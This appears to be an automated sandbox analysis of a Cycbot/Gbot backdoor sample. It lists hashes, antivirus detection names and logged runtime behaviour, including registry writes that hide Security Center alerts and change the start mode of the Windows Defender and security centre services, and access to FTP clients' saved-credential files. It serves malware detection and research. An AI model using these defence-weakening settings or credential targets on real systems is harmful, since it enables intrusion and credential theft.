Analysis Date: 2018-05-07 00:56:00
MD5: 83157a64fa8573ad9d40749eba443ff2
SHA1: 04ac1e0c781fb418265ecb2bdd02f17d86f523df

Static Details:

File type: PE32 executable (GUI) Intel 80386, for MS Windows
PEhash:
AV Trend Micro: BKDR_CYCBOT.SMTE
AV Fortinet: W32/CYCBot.F!tr
AV CA (E-Trust Ino): Gen:Variant.Kazy.56036
AV Rising: Trojan.Win32.Generic.12B751A9
AV NANO: Error Scanning File
AV Eset (nod32): Win32/Kryptik.AAZR
AV K7: Error Scanning File
AV Mcafee: BackDoor-EXI.gen.ah
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997
AV Symantec: Backdoor.Cycbot!gen10
AV BullGuard: Gen:Variant.Kazy.56036
AV Windows Defender: Backdoor:Win32/Cycbot.G
AV MalwareBytes: Trojan.Dropper.PE4
AV Padvish: No Virus
AV F-Secure: Gen:Variant.Kazy.56036
AV ClamAV: No Virus
AV Authentium: W32/Goolbot.P.gen!Eldorado
AV MicroWorld (escan): Gen:Variant.Kazy.56036
AV Alwil (avast): Cycbot-SF [Trj]
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV Twister: No Virus
AV Dr. Web: BackDoor.Gbot.2028
AV Frisk (f-prot): W32/Goolbot.P.gen!Eldorado
AV Zillya!: No Virus
AV Ad-Aware: Gen:Variant.Kazy.56036
AV Avira (antivir): TR/Crypt.EPACK.Gen2
AV SUPERAntiSpyware: Trojan.Agent/Gen-Kazy[Ex]
AV Grisoft (avg): Error Scanning File
AV BitDefender: Gen:Variant.Kazy.56036
AV 360 Safe: No Virus
AV Ikarus: Virus.Win32.Cryptor
AV Emsisoft: Gen:Variant.Kazy.56036
AV CAT (quickheal): Backdoor.Cycbot.B
AV Arcabit (arcavir): Gen:Variant.Kazy.56036
AV Kaspersky: Backdoor.Win32.Gbot.qxd

Runtime Details:

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates Mutex: RasPbFile
Creates Mutex: {B1D429DE-B782-4253-84AD-6E09A8438AD5}
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth ➝ 1
Registry: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start ➝ 3
Registry: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start ➝ 3

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates Mutex: RasPbFile

Process
↳ C:\Program Files (x86)\LP\0ADE\204F.tmp

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Users\Phil\AppData\Local\Temp\HWID
Creates File: C:\Windows\wcx_ftp.ini
Creates File: C:\Users\Phil\AppData\Roaming\GHISLER\wcx_ftp.ini
Creates File: C:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
Creates File: C:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates File: C:\Users\Phil\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates File: C:\Users\Phil\AppData\Roaming\CuteFTP\sm.dat
Creates File: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
Creates File: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates File: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates File: C:\ProgramData\CuteFTP\sm.dat
Creates File: C:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
Creates File: C:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
Creates File: C:\Users\Phil\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
Creates File: C:\Users\Phil\AppData\Local\CuteFTP\sm.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\3\Sites.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\4\Sites.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\3\Quick.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\4\Quick.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\3\History.dat
Creates File: C:\Users\Phil\AppData\Roaming\FlashFXP\4\History.dat
Creates File: C:\ProgramData\FlashFXP\3\Sites.dat
Creates File: C:\ProgramData\FlashFXP\4\Sites.dat
Creates File: C:\ProgramData\FlashFXP\3\Quick.dat
Creates File: C:\ProgramData\FlashFXP\4\Quick.dat
Creates File: C:\ProgramData\FlashFXP\3\History.dat
Creates File: C:\ProgramData\FlashFXP\4\History.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\3\Sites.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\4\Sites.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\3\Quick.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\4\Quick.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\3\History.dat
Creates File: C:\Users\Phil\AppData\Local\FlashFXP\4\History.dat
Creates File: C:\Users\Phil\AppData\Roaming\FileZilla\sitemanager.xml
Creates File: C:\Users\Phil\AppData\Roaming\FileZilla\recentservers.xml
Creates File: C:\Users\Phil\AppData\Roaming\FileZilla\filezilla.xml
Creates File: C:\ProgramData\FileZilla\sitemanager.xml
Creates File: C:\ProgramData\FileZilla\recentservers.xml
Creates File: C:\ProgramData\FileZilla\filezilla.xml
Creates File: C:\Users\Phil\AppData\Local\FileZilla\sitemanager.xml
Creates File: C:\Users\Phil\AppData\Local\FileZilla\recentservers.xml
Creates File: C:\Users\Phil\AppData\Local\FileZilla\filezilla.xml
Creates File: C:\Users\Phil\AppData\Roaming\SharedSettings.ccs
Creates File: C:\Users\Phil\AppData\Roaming\SharedSettings.sqlite
Creates File: C:\ProgramData\SharedSettings.ccs
Creates File: C:\ProgramData\SharedSettings.sqlite
Creates File: C:\Users\Phil\AppData\Local\SharedSettings.ccs
Creates File: C:\Users\Phil\AppData\Local\SharedSettings.sqlite
Creates File: C:\Windows\32BitFtp.ini
Registry: HKEY_CURRENT_USER\Software\WinRAR\HWID ➝ {ADADB18D-F1D5-455B-A66A-537B53D44DFE}

Process
↳ C:\Users\Phil\AppData\Local\Temp\04ac1e0c781fb418265ecb2bdd02f17d86f523df.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates Mutex: RasPbFile

Network Details:


Raw Pcap